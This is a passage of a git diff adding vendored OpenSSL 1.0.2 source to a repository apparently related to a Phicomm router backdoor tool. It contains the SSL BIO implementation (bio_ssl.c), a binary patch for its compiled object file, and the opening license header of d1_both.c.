+#include <openssl/ssl.h>
+
+static int ssl_write(BIO *h, const char *buf, int num);
+static int ssl_read(BIO *h, char *buf, int size);
+static int ssl_puts(BIO *h, const char *str);
+static long ssl_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int ssl_new(BIO *h);
+static int ssl_free(BIO *data);
+static long ssl_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+typedef struct bio_ssl_st {
+    SSL *ssl;                   /* The ssl handle :-) */
+    /* re-negotiate every time the total number of bytes is this size */
+    int num_renegotiates;
+    unsigned long renegotiate_count;
+    unsigned long byte_count;
+    unsigned long renegotiate_timeout;
+    unsigned long last_time;
+} BIO_SSL;
+
+static BIO_METHOD methods_sslp = {
+    BIO_TYPE_SSL, "ssl",
+    ssl_write,
+    ssl_read,
+    ssl_puts,
+    NULL,                       /* ssl_gets, */
+    ssl_ctrl,
+    ssl_new,
+    ssl_free,
+    ssl_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_ssl(void)
+{
+    return (&methods_sslp);
+}
+
+static int ssl_new(BIO *bi)
+{
+    BIO_SSL *bs;
+
+    bs = (BIO_SSL *)OPENSSL_malloc(sizeof(BIO_SSL));
+    if (bs == NULL) {
+        BIOerr(BIO_F_SSL_NEW, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    memset(bs, 0, sizeof(BIO_SSL));
+    bi->init = 0;
+    bi->ptr = (char *)bs;
+    bi->flags = 0;
+    return (1);
+}
+
+static int ssl_free(BIO *a)
+{
+    BIO_SSL *bs;
+
+    if (a == NULL)
+        return (0);
+    bs = (BIO_SSL *)a->ptr;
+    if (bs->ssl != NULL)
+        SSL_shutdown(bs->ssl);
+    if (a->shutdown) {
+        if (a->init && (bs->ssl != NULL))
+            SSL_free(bs->ssl);
+        a->init = 0;
+        a->flags = 0;
+    }
+    if (a->ptr != NULL)
+        OPENSSL_free(a->ptr);
+    return (1);
+}
+
+static int ssl_read(BIO *b, char *out, int outl)
+{
+    int ret = 1;
+    BIO_SSL *sb;
+    SSL *ssl;
+    int retry_reason = 0;
+    int r = 0;
+
+    if (out == NULL)
+        return (0);
+    sb = (BIO_SSL *)b->ptr;
+    ssl = sb->ssl;
+
+    BIO_clear_retry_flags(b);
+
+#if 0
+    if (!SSL_is_init_finished(ssl)) {
+/*              ret=SSL_do_handshake(ssl); */
+        if (ret > 0) {
+
+            outflags = (BIO_FLAGS_READ | BIO_FLAGS_SHOULD_RETRY);
+            ret = -1;
+            goto end;
+        }
+    }
+#endif
+/*      if (ret > 0) */
+    ret = SSL_read(ssl, out, outl);
+
+    switch (SSL_get_error(ssl, ret)) {
+    case SSL_ERROR_NONE:
+        if (ret <= 0)
+            break;
+        if (sb->renegotiate_count > 0) {
+            sb->byte_count += ret;
+            if (sb->byte_count > sb->renegotiate_count) {
+                sb->byte_count = 0;
+                sb->num_renegotiates++;
+                SSL_renegotiate(ssl);
+                r = 1;
+            }
+        }
+        if ((sb->renegotiate_timeout > 0) && (!r)) {
+            unsigned long tm;
+
+            tm = (unsigned long)time(NULL);
+            if (tm > sb->last_time + sb->renegotiate_timeout) {
+                sb->last_time = tm;
+                sb->num_renegotiates++;
+                SSL_renegotiate(ssl);
+            }
+        }
+
+        break;
+    case SSL_ERROR_WANT_READ:
+        BIO_set_retry_read(b);
+        break;
+    case SSL_ERROR_WANT_WRITE:
+        BIO_set_retry_write(b);
+        break;
+    case SSL_ERROR_WANT_X509_LOOKUP:
+        BIO_set_retry_special(b);
+        retry_reason = BIO_RR_SSL_X509_LOOKUP;
+        break;
+    case SSL_ERROR_WANT_ACCEPT:
+        BIO_set_retry_special(b);
+        retry_reason = BIO_RR_ACCEPT;
+        break;
+    case SSL_ERROR_WANT_CONNECT:
+        BIO_set_retry_special(b);
+        retry_reason = BIO_RR_CONNECT;
+        break;
+    case SSL_ERROR_SYSCALL:
+    case SSL_ERROR_SSL:
+    case SSL_ERROR_ZERO_RETURN:
+    default:
+        break;
+    }
+
+    b->retry_reason = retry_reason;
+    return (ret);
+}
+
+static int ssl_write(BIO *b, const char *out, int outl)
+{
+    int ret, r = 0;
+    int retry_reason = 0;
+    SSL *ssl;
+    BIO_SSL *bs;
+
+    if (out == NULL)
+        return (0);
+    bs = (BIO_SSL *)b->ptr;
+    ssl = bs->ssl;
+
+    BIO_clear_retry_flags(b);
+
+    /*
+     * ret=SSL_do_handshake(ssl); if (ret > 0)
+     */
+    ret = SSL_write(ssl, out, outl);
+
+    switch (SSL_get_error(ssl, ret)) {
+    case SSL_ERROR_NONE:
+        if (ret <= 0)
+            break;
+        if (bs->renegotiate_count > 0) {
+            bs->byte_count += ret;
+            if (bs->byte_count > bs->renegotiate_count) {
+                bs->byte_count = 0;
+                bs->num_renegotiates++;
+                SSL_renegotiate(ssl);
+                r = 1;
+            }
+        }
+        if ((bs->renegotiate_timeout > 0) && (!r)) {
+            unsigned long tm;
+
+            tm = (unsigned long)time(NULL);
+            if (tm > bs->last_time + bs->renegotiate_timeout) {
+                bs->last_time = tm;
+                bs->num_renegotiates++;
+                SSL_renegotiate(ssl);
+            }
+        }
+        break;
+    case SSL_ERROR_WANT_WRITE:
+        BIO_set_retry_write(b);
+        break;
+    case SSL_ERROR_WANT_READ:
+        BIO_set_retry_read(b);
+        break;
+    case SSL_ERROR_WANT_X509_LOOKUP:
+        BIO_set_retry_special(b);
+        retry_reason = BIO_RR_SSL_X509_LOOKUP;
+        break;
+    case SSL_ERROR_WANT_CONNECT:
+        BIO_set_retry_special(b);
+        retry_reason = BIO_RR_CONNECT;
+    case SSL_ERROR_SYSCALL:
+    case SSL_ERROR_SSL:
+    default:
+        break;
+    }
+
+    b->retry_reason = retry_reason;
+    return (ret);
+}
+
+static long ssl_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    SSL **sslp, *ssl;
+    BIO_SSL *bs;
+    BIO *dbio, *bio;
+    long ret = 1;
+
+    bs = (BIO_SSL *)b->ptr;
+    ssl = bs->ssl;
+    if ((ssl == NULL) && (cmd != BIO_C_SET_SSL))
+        return (0);
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        SSL_shutdown(ssl);
+
+        if (ssl->handshake_func == ssl->method->ssl_connect)
+            SSL_set_connect_state(ssl);
+        else if (ssl->handshake_func == ssl->method->ssl_accept)
+            SSL_set_accept_state(ssl);
+
+        SSL_clear(ssl);
+
+        if (b->next_bio != NULL)
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        else if (ssl->rbio != NULL)
+            ret = BIO_ctrl(ssl->rbio, cmd, num, ptr);
+        else
+            ret = 1;
+        break;
+    case BIO_CTRL_INFO:
+        ret = 0;
+        break;
+    case BIO_C_SSL_MODE:
+        if (num)                /* client mode */
+            SSL_set_connect_state(ssl);
+        else
+            SSL_set_accept_state(ssl);
+        break;
+    case BIO_C_SET_SSL_RENEGOTIATE_TIMEOUT:
+        ret = bs->renegotiate_timeout;
+        if (num < 60)
+            num = 5;
+        bs->renegotiate_timeout = (unsigned long)num;
+        bs->last_time = (unsigned long)time(NULL);
+        break;
+    case BIO_C_SET_SSL_RENEGOTIATE_BYTES:
+        ret = bs->renegotiate_count;
+        if ((long)num >= 512)
+            bs->renegotiate_count = (unsigned long)num;
+        break;
+    case BIO_C_GET_SSL_NUM_RENEGOTIATES:
+        ret = bs->num_renegotiates;
+        break;
+    case BIO_C_SET_SSL:
+        if (ssl != NULL) {
+            ssl_free(b);
+            if (!ssl_new(b))
+                return 0;
+        }
+        b->shutdown = (int)num;
+        ssl = (SSL *)ptr;
+        ((BIO_SSL *)b->ptr)->ssl = ssl;
+        bio = SSL_get_rbio(ssl);
+        if (bio != NULL) {
+            if (b->next_bio != NULL)
+                BIO_push(bio, b->next_bio);
+            b->next_bio = bio;
+            CRYPTO_add(&bio->references, 1, CRYPTO_LOCK_BIO);
+        }
+        b->init = 1;
+        break;
+    case BIO_C_GET_SSL:
+        if (ptr != NULL) {
+            sslp = (SSL **)ptr;
+            *sslp = ssl;
+        } else
+            ret = 0;
+        break;
+    case BIO_CTRL_GET_CLOSE:
+        ret = b->shutdown;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+        b->shutdown = (int)num;
+        break;
+    case BIO_CTRL_WPENDING:
+        ret = BIO_ctrl(ssl->wbio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_PENDING:
+        ret = SSL_pending(ssl);
+        if (ret == 0)
+            ret = BIO_pending(ssl->rbio);
+        break;
+    case BIO_CTRL_FLUSH:
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(ssl->wbio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+    case BIO_CTRL_PUSH:
+        if ((b->next_bio != NULL) && (b->next_bio != ssl->rbio)) {
+            SSL_set_bio(ssl, b->next_bio, b->next_bio);
+            CRYPTO_add(&b->next_bio->references, 1, CRYPTO_LOCK_BIO);
+        }
+        break;
+    case BIO_CTRL_POP:
+        /* Only detach if we are the BIO explicitly being popped */
+        if (b == ptr) {
+            /*
+             * Shouldn't happen in practice because the rbio and wbio are the
+             * same when pushed.
+             */
+            if (ssl->rbio != ssl->wbio)
+                BIO_free_all(ssl->wbio);
+            if (b->next_bio != NULL)
+                CRYPTO_add(&b->next_bio->references, -1, CRYPTO_LOCK_BIO);
+            ssl->wbio = NULL;
+            ssl->rbio = NULL;
+        }
+        break;
+    case BIO_C_DO_STATE_MACHINE:
+        BIO_clear_retry_flags(b);
+
+        b->retry_reason = 0;
+        ret = (int)SSL_do_handshake(ssl);
+
+        switch (SSL_get_error(ssl, (int)ret)) {
+        case SSL_ERROR_WANT_READ:
+            BIO_set_flags(b, BIO_FLAGS_READ | BIO_FLAGS_SHOULD_RETRY);
+            break;
+        case SSL_ERROR_WANT_WRITE:
+            BIO_set_flags(b, BIO_FLAGS_WRITE | BIO_FLAGS_SHOULD_RETRY);
+            break;
+        case SSL_ERROR_WANT_CONNECT:
+            BIO_set_flags(b, BIO_FLAGS_IO_SPECIAL | BIO_FLAGS_SHOULD_RETRY);
+            b->retry_reason = b->next_bio->retry_reason;
+            break;
+        default:
+            break;
+        }
+        break;
+    case BIO_CTRL_DUP:
+        dbio = (BIO *)ptr;
+        if (((BIO_SSL *)dbio->ptr)->ssl != NULL)
+            SSL_free(((BIO_SSL *)dbio->ptr)->ssl);
+        ((BIO_SSL *)dbio->ptr)->ssl = SSL_dup(ssl);
+        ((BIO_SSL *)dbio->ptr)->renegotiate_count =
+            ((BIO_SSL *)b->ptr)->renegotiate_count;
+        ((BIO_SSL *)dbio->ptr)->byte_count = ((BIO_SSL *)b->ptr)->byte_count;
+        ((BIO_SSL *)dbio->ptr)->renegotiate_timeout =
+            ((BIO_SSL *)b->ptr)->renegotiate_timeout;
+        ((BIO_SSL *)dbio->ptr)->last_time = ((BIO_SSL *)b->ptr)->last_time;
+        ret = (((BIO_SSL *)dbio->ptr)->ssl != NULL);
+        break;
+    case BIO_C_GET_FD:
+        ret = BIO_ctrl(ssl->rbio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_SET_CALLBACK:
+        {
+#if 0                           /* FIXME: Should this be used? -- Richard
+                                 * Levitte */
+            SSLerr(SSL_F_SSL_CTRL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+            ret = -1;
+#else
+            ret = 0;
+#endif
+        }
+        break;
+    case BIO_CTRL_GET_CALLBACK:
+        {
+            void (**fptr) (const SSL *xssl, int type, int val);
+
+            fptr = (void (**)(const SSL *xssl, int type, int val))ptr;
+            *fptr = SSL_get_info_callback(ssl);
+        }
+        break;
+    default:
+        ret = BIO_ctrl(ssl->rbio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+}
+
+static long ssl_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    SSL *ssl;
+    BIO_SSL *bs;
+    long ret = 1;
+
+    bs = (BIO_SSL *)b->ptr;
+    ssl = bs->ssl;
+    switch (cmd) {
+    case BIO_CTRL_SET_CALLBACK:
+        {
+            /*
+             * FIXME: setting this via a completely different prototype seems
+             * like a crap idea
+             */
+            SSL_set_info_callback(ssl, (void (*)(const SSL *, int, int))fp);
+        }
+        break;
+    default:
+        ret = BIO_callback_ctrl(ssl->rbio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+static int ssl_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = BIO_write(bp, str, n);
+    return (ret);
+}
+
+BIO *BIO_new_buffer_ssl_connect(SSL_CTX *ctx)
+{
+#ifndef OPENSSL_NO_SOCK
+    BIO *ret = NULL, *buf = NULL, *ssl = NULL;
+
+    if ((buf = BIO_new(BIO_f_buffer())) == NULL)
+        return (NULL);
+    if ((ssl = BIO_new_ssl_connect(ctx)) == NULL)
+        goto err;
+    if ((ret = BIO_push(buf, ssl)) == NULL)
+        goto err;
+    return (ret);
+ err:
+    if (buf != NULL)
+        BIO_free(buf);
+    if (ssl != NULL)
+        BIO_free(ssl);
+#endif
+    return (NULL);
+}
+
+BIO *BIO_new_ssl_connect(SSL_CTX *ctx)
+{
+#ifndef OPENSSL_NO_SOCK
+    BIO *ret = NULL, *con = NULL, *ssl = NULL;
+
+    if ((con = BIO_new(BIO_s_connect())) == NULL)
+        return (NULL);
+    if ((ssl = BIO_new_ssl(ctx, 1)) == NULL)
+        goto err;
+    if ((ret = BIO_push(ssl, con)) == NULL)
+        goto err;
+    return (ret);
+ err:
+    if (con != NULL)
+        BIO_free(con);
+#endif
+    return (NULL);
+}
+
+BIO *BIO_new_ssl(SSL_CTX *ctx, int client)
+{
+    BIO *ret;
+    SSL *ssl;
+
+    if ((ret = BIO_new(BIO_f_ssl())) == NULL)
+        return (NULL);
+    if ((ssl = SSL_new(ctx)) == NULL) {
+        BIO_free(ret);
+        return (NULL);
+    }
+    if (client)
+        SSL_set_connect_state(ssl);
+    else
+        SSL_set_accept_state(ssl);
+
+    BIO_set_ssl(ret, ssl, BIO_CLOSE);
+    return (ret);
+}
+
+int BIO_ssl_copy_session_id(BIO *t, BIO *f)
+{
+    t = BIO_find_type(t, BIO_TYPE_SSL);
+    f = BIO_find_type(f, BIO_TYPE_SSL);
+    if ((t == NULL) || (f == NULL))
+        return (0);
+    if ((((BIO_SSL *)t->ptr)->ssl == NULL) ||
+        (((BIO_SSL *)f->ptr)->ssl == NULL))
+        return (0);
+    SSL_copy_session_id(((BIO_SSL *)t->ptr)->ssl, ((BIO_SSL *)f->ptr)->ssl);
+    return (1);
+}
+
+void BIO_ssl_shutdown(BIO *b)
+{
+    SSL *s;
+
+    while (b != NULL) {
+        if (b->method->type == BIO_TYPE_SSL) {
+            s = ((BIO_SSL *)b->ptr)->ssl;
+            SSL_shutdown(s);
+            break;
+        }
+        b = b->next_bio;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/bio_ssl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/bio_ssl.o
new file mode 100644
index 0000000000000000000000000000000000000000..d9e6fe2f9de6f87640358cfa64601ba4563a0fed
GIT binary patch
literal 10176
zcmd6sYj9h|6@afTCw5+vpd`2?0VNTs1BsBr%OPoM*;aBDl&2j^^QbIK@`KotD_!N$
z5K@qx^j2}oqwSQLGKEq)Orb#AnKq<gJP9F$AtlXppcLr1GZYXiw2%@qK<u8g_Z)eB
zqf1+cAKjU&-Tn6L*|TRKclT;{AhfK!tW4ohrYu!Pb4(SbZjO`|$vWkH<vit-<KmCh
z+;Xp)tIZDEwFzo&w=<9BYgGNkw=i)4)onP8g8t@!@Aam&YTt;qHk51ks`|&l+!8nD
z#|hc&&KZg}JG--5(d=VOjy6=IvZD<yjMUstum1^DJX*I=AKI|dzezL{)X%8dV<W2m
zp>Od0M?(5h^}|1?{cA^rWoSv$!JDwM{;}GBH7b0{3qQgHwQn#pGvFKa9Xsd;Hn0^-
zU0muLEX-B)Lyu1e;2Tu+mrgxImWghvdXtw-+-UUphM@kUe|=Ct>u(O~&#!M%b7An+
z<!awMnF-n9Zb#o)o1$cg9lI~>JMGy2GGzLfjbzW*9ea;MTJ4_-4Jm50;x@JH#L|(W
z?C>^6?~{Obe+6szP6Z$Ao|_$x11(2IosPcmVa41oXGs5RNPmBz6QuLs5v?Q~y%DI8
zPl?<uj^5)?mL1;h=-nd{yBxjuq4YY`p#Q`0M=nsM=GJ@F#cOIZ6PXt5kauOOIL~n~
zx2qP0Br^pKfP|xW7|bF|plKzq7`j*Xoz^Cb2J)|hgpoRlvbm@$m>picd%S;O98?JD
zX_s%rFhy^u$)7M}oWWa%M?j%t|5KuYv@`!3Ohltq`CmW+9XvCb3wQ&1W=2SVGo-sn
z#}ORi>4jAx=wSQVkr9mZ5CeT7pM<KxTn74ZT7%9V6?KAocdgpLOZ6XUg%;KRDPWdz
z5JzSJyCh`%M+4QOe|FHYvhQ_AuNzhA^WFJRfUk_kXXK{>L38qNqng~VYVr%}%fE$;
zd>)Dpp^CoO4LPUpnD6AkL~aU7^UpyE7(U=&D5;yo3<QGu)55&`-B5u#=IFf%^)Ajh
z9lb4>(%<KXarpcPvIxz+RI^7_L)CmJUb*ORj=ni42i;H??Q+rrrt#M<Msfdv+d)D&
zD*O8p(kOJO;4QFHf!K+0{!j2DI)kHu1pMj7m@R`C`W@2W5T)5OHf?J5Or<t^U;+qb
z&y+j*ehZ1hIN>H%lD{9=0IpRgFe7Snb#A{NaOZK(2Xl>X+`C4%5ojow+vN6&c7izZ
zb(@fatxL_VaH`o_FiLeoy4vsf{?m}IhO|q~t*e2wOV!uZ6g+HpP_J+s8&%;VToT5J
zZ`|zP<lpT7y4a3D@5YcmM2L0`|N4OM9e*?I7uml%^=9{En2?U%3gK|rK=coUvx533
zq1=_i(j3a@?}qdbMHXWH8NYr+Wb`B1GgXegPeFfa5cET^rQD&GJque(pzj^W{s*uu
z*91%Uq&6cMJ)+tgU|0{O#;bZmbz!1Pn_S@%HM`TLXghdC=9*lpt*J&`bYg29L~BMG
zs@Q}=vlyG=ki02uDJ-G!c=Ji<jInkKmlYXo4#cJv8LS#&<=_*&%k5UPPdgj+x7dxJ
z>a%}}o_!{tRXX-Qgtd*OaE{OJ5SssMpT$e~Y^~X6bz=U4&v079wq^LNrs#`NpZ%}?
zQTuT>RSaL@3rX$&G6H{dlYUAx1A7H*jas0%R&=pdP60Duj*=y?C-%LfRT??tr5)1q
z2hpy9ZunuFVMfEt*uU9muX(+ypIs{|jc%%<wS}-!Mt4yt#NByJldxutMUTe40Y-xA
z4X|1)HKW`TT*kEbsYX98WYgf)pv~X~S~y?TpBXI~%v2O!@(mXCgWVqtRKg5wGOQPA
zsH^ISjoyGWU^yPbHfz*e1MVeoE`S5g3^i8|IWOi;Yjz<m&IpBa(7(}e3<}OvbCtK&
zVjG#sbdnPL0-U633x7G>+L;We(_NmZ0>3z5|6c*^{#?WIhKB20HS1e52`%GV<hj!0
zUEsSmBeK3*7J5D2tL7QlXte?&e1+iTUcPF*0_F@N!;J*P1xBQleRG{sw%u7aeR5?L
zzLk*Apt5-wZ?HR8*{c+M>0Cv;6XRue=f3hrdv(_4x4X(W*sJ|^XT7}&+uTHQvna+_
zS`Vc=Fb>$A+4AyMP^*L>yN}AQK?6bW{_=pmy5APCyY^Ky+H3ZV^V_}I@wV|56YVw7
zSiQZvUbGdM1f`7<fa-Pdyb2G7t8n!ReNct;`HT7*?RB=PWp*#<kd;D}I(S@Im*Y>>
zQC3n1`XNR-@I{NE2A=K2gg-!Ue|gAWy$^kutth{dd!`6~|CD4mU}ccqSMIl0@3BFT
z%dcmD<G4IeaxLe|t(E2eMRH-3gE81s9^~;`Ddhb2Dlz^vcfW*k{~@5t3gx|#Qew7}
zHzu5eJPXIxvVkUZz(ZTPq({t2U^9txUd%~gbBW&xF@{-2Bz|pTHAn!GSHOe%e@$4-
zPe@-&d^-6|%uSN9DdQ<M8r4A(^{f?d6PkO#g2el%ii`9$0WVWv0Z>@O35abHmoRYj
z#<{_!@C+MUW>dt8d<<+6IWlrg3AT%8>9HXWS)9w}uoFNj-fzM2#92!IF$?~<1wUfJ
zU$Ee>S@41d$18s+JEvK29M4knms;?J7JRV<zutm>)q=NJ@E!}^Yr*kdP^w?|Snx+I
zIDU*Mr3Wu+rT9q;j@Q6a^6y#jGT6gP$xi})KCHY4Dq#XZ;FW`SP~^WP-eVLivn=$?
zv*11pejVwbMN3}n>Cnb13;9hXzmw!!$ewK$^1USg3dxH-9_swaLjLC#e1P;^H^FGI
z_zoCz-U>$}U0tn_=$3F)OLgH1EZmlg$3>ziqoqY65#J`_qDU$pi3zeT)v3jm?zq;G
zjHU4u*Q0ns4PGU@JhZyr9}2HtwyY`89B%g4hXP@xKDgS{UQ<&joQ`YZ&O}?XSfmKr
zk<ntwZ3&SPCN-@4+M4FohIy#TXq#v^bR!v60_)a=!R&B6l}e@zJ)k|BOeEq_Eu7XO
zU@f;9iALi+GK_Y`BPm7e>^5ZDp=Ju4CCu*0q&pO9D-w%^p|LGOQ%^h*>rAv8eM1+D
zPNJr8TUVq#ZRC?ZJHm<hc2F4CQag$!uy*WU7<wQIV##nvBoRw@M7E3?Vsr>~qq_{v
z*pXPKM^r*%&vl|0ClpJ?6Y=(>*2(=he241VaMXm6Fv@aTsKt>NQaC3tK|<_O!O~-L
zDAAf}Ym28)+nAy@Dllq^LhwsEo=$fr6XDL7(Nt$57S?w37=4eT=S&i)HqFyRxtP`y
zo;WUq=aUg5tdKaKTbais{zZx7#}W*v=OTDm{xCuau$+`Hz{C7FLI^02=WOQqKEi+;
z&o<2QyCeqGgKvN4uMtOi+0IiE$3C*W4HZB@`Agtoj{6}7<SuxaFO|5gN0qp&r$gei
zBs~vHe73}gBtA#t9}ve#_FDxV8PQI+B)?YTmr6V-aXb@pzj`H(dmHl~N?ew|U*a{A
z{Bsh=GbrnMg}B-NcO`k*{z=#&2pC-k59?V#+^lDzB=45wn<XyyD<<*FCHa)Z=S%!<
zi7$}&Ll*qF#N~DIXNh|xJ=5vviN$#K=Kl6dT(<u%iF+madnGR0|109?H(W2Z@L>2z
zl9%V_G&+}~JwABYp7|1&{ZMDYn=N>U1wSBhxxYsxzEHB~j}n*r`v!6DFW<dAl~5T1
z_Dk;X3W>}8ZIQU#U(JGl+k!t#9PPo6@a)egE%;GM5B}rC@-IpJ8i~IxalE6k{27VM
z`_+iV<^AdcIwzrj=1O`NNPLmRua>xM=L(7A_Yt;dv&3aP+a*3nlHV)w#S;In#N~E>
zEODIU-0q_im)m{9f*+H(Y)?Vr_&t>Me{8|$(RmU5xm1$Je}ga}p9T->c@!Z8<kR6{
zzEoPL^0?d}>6hPkr~?DeH+)_$!<?ZPW9C<oUNXPPR}klW0Lx!XobM3K7Zb<tBp8?v
z(*BONVPNjS4nn|pJqG3tB<~V*l&>M~Ht}x|uQ73cKjEH$f%O-tUEDJ<Fz+Ni{4J09
zR_Yh;m&{iaUt*{!>N!Nb&csu+A2ph|o49J?R}c@Gcs=noCVm_7W)t5-{6-VsN}Tsa
z?pGV}7L)vG;xQAyllGAg6Au&bGVx8sdrW*Qam~bkLVUZ4|BU#}CjJBBJfCseW17F<
z@VrHiedg~^JU^N9_bM02U|`PQ&v^bY=kH-WPnh%fvpS(=R1cnwFz~puyg`jKC#HE^
zn6rN7tfz$pn6sT`f3iKdo8;O4ArogmxY0lete^eXVdDJ#;ARu&?*|W>IN$qEm^k0>
z&zLyh<6UToWDnoV6;FCcw-#xISW6jk2d7f;u82p2d!yosMYM?GX-%gUPb!HS6!&?2
zkVPSbQAQL4_P{MQ(xrH!$?ooW0+b|@THFJFA}oNLFx+2_e0w6}=}9Gf;wfzhDTsH#
zH9G?L;LjnrKnJ>nmSa(49i<}lKHvg!A7{lo1-HPuA~6y}^g?=;)(@Uhur9A7ULSLb
z({^c8hTr>4?Q(&+ecX>x=Vz^tXEW4^XFxe{`*s;Zn%n0%K#ZnOQTj2m|64_3B<OWf
zq;-%g<-Z5<a*BaEhW^7bGW%~GFto+o|2o>B)<BsYTyh4|E8!{GJ_!y&IR<PW+cvk~
z3Jlxl{R@&J+)nM|T}Te>H;%VJA*W@z-|+@3!xFOieH^El+5dx7-vwoIVEdWf1qp25
zTz`n_drbxA`um}7DgSlMGFqsm&Y}ONz{B-<{+DVSYdTRF11(G^BymZZ>*F*tk3As8
hiI;i^FPQ8nbBsdxJrABz_3xc+h}=_@G!o|e{|1C_*5?2K

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_both.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_both.c
new file mode 100644
index 0000000..2553c3d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_both.c
@@ -0,0 +1,1523 @@
+/* ssl/d1_both.c */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
